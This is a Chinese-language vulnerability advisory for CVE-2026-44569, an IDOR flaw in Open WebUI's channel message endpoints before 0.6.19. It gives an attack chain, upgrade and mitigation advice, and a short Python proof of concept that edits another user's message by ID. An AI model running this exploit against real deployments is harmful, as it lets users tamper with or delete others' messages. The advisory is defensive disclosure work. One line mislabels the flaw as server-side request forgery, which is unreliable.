IPBUF安全漏洞报告
English
CVE-2026-44569 CVSS 7.1 高危

CVE-2026-44569 Open WebUI消息管理IDOR漏洞

披露日期: 2026-05-15

漏洞信息

漏洞编号
CVE-2026-44569
漏洞类型
IDOR (不安全的直接对象引用)
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open WebUI

相关标签

IDOROpen WebUI权限绕过逻辑漏洞

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.6.19版本之前,其频道消息管理系统中存在不安全的直接对象引用(IDOR)漏洞。已认证的用户可以修改或删除其拥有读取权限的任何频道内的任意消息。该漏洞位于消息更新和删除端点,后端仅验证了频道级别的访问权限,而完全缺乏对消息所有权的验证。尽管前端实现了所有权检查,但后端API绕过了这些保护,允许攻击者直接调用API篡改他人消息。该漏洞已在0.6.19版本中修复。

技术细节

该漏洞属于典型的服务器端请求伪造与权限绕过问题。Open WebUI的后端API在处理消息更新和删除请求时,仅验证了请求者是否具备目标频道的访问权限(即是否为频道成员),而未进一步验证请求者是否为特定消息的创建者或所有者。虽然前端界面通过UI逻辑限制了编辑和删除按钮的显示,但这仅是客户端的安全控制,无法防止拥有低权限的攻击者直接构造恶意的HTTP请求。攻击者只需拥有普通账号并加入目标频道,即可通过抓包分析获取API端点结构,修改请求参数中的消息ID(Message ID)为受害者的消息ID,并发送PUT或DELETE请求。服务器因缺乏所有权校验而接受请求,导致数据完整性被破坏。

攻击链分析

STEP 1
步骤1:信息收集与访问
攻击者注册并登录Open WebUI平台,加入目标频道以获取对该频点的读取权限。
STEP 2
步骤2:分析API接口
攻击者使用抓包工具(如Burp Suite)分析自身正常的消息更新或删除请求,确定API端点结构和所需参数。
STEP 3
步骤3:构造恶意请求
攻击者将请求参数中的消息ID替换为受害者的消息ID,保持会话令牌不变,直接发送修改或删除请求。
STEP 4
步骤4:执行攻击
后端验证频道权限通过(未验证所有权),执行操作,导致受害者消息被篡改或删除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://localhost:3000" login_creds = {"username": "attacker", "password": "password"} victim_message_id = "TARGET_MESSAGE_ID_HERE" # 1. Authenticate to get session token session = requests.Session() login_resp = session.post(f"{target_url}/api/v1/auths/login", json=login_creds) if login_resp.status_code != 200: print("Login failed") exit() # 2. Exploit IDOR to update victim's message # The backend checks channel access but not message ownership update_payload = { "content": "This message has been modified by an attacker via IDOR." } # Send update request for a message not owned by the attacker exploit_url = f"{target_url}/api/v1/channels/messages/{victim_message_id}" response = session.put(exploit_url, json=update_payload) if response.status_code == 200: print("[+] Successfully exploited IDOR: Message updated.") else: print("[-] Exploit failed.")

影响范围

Open WebUI < 0.6.19

防御指南

临时缓解措施
建议立即将Open WebUI升级至0.6.19或更高版本以修复此漏洞。如果无法立即升级,应严格限制系统用户注册和频道加入权限,仅允许受信任用户访问。同时,可部署Web应用防火墙(WAF)规则,检测并拦截针对消息管理接口的异常参数修改请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表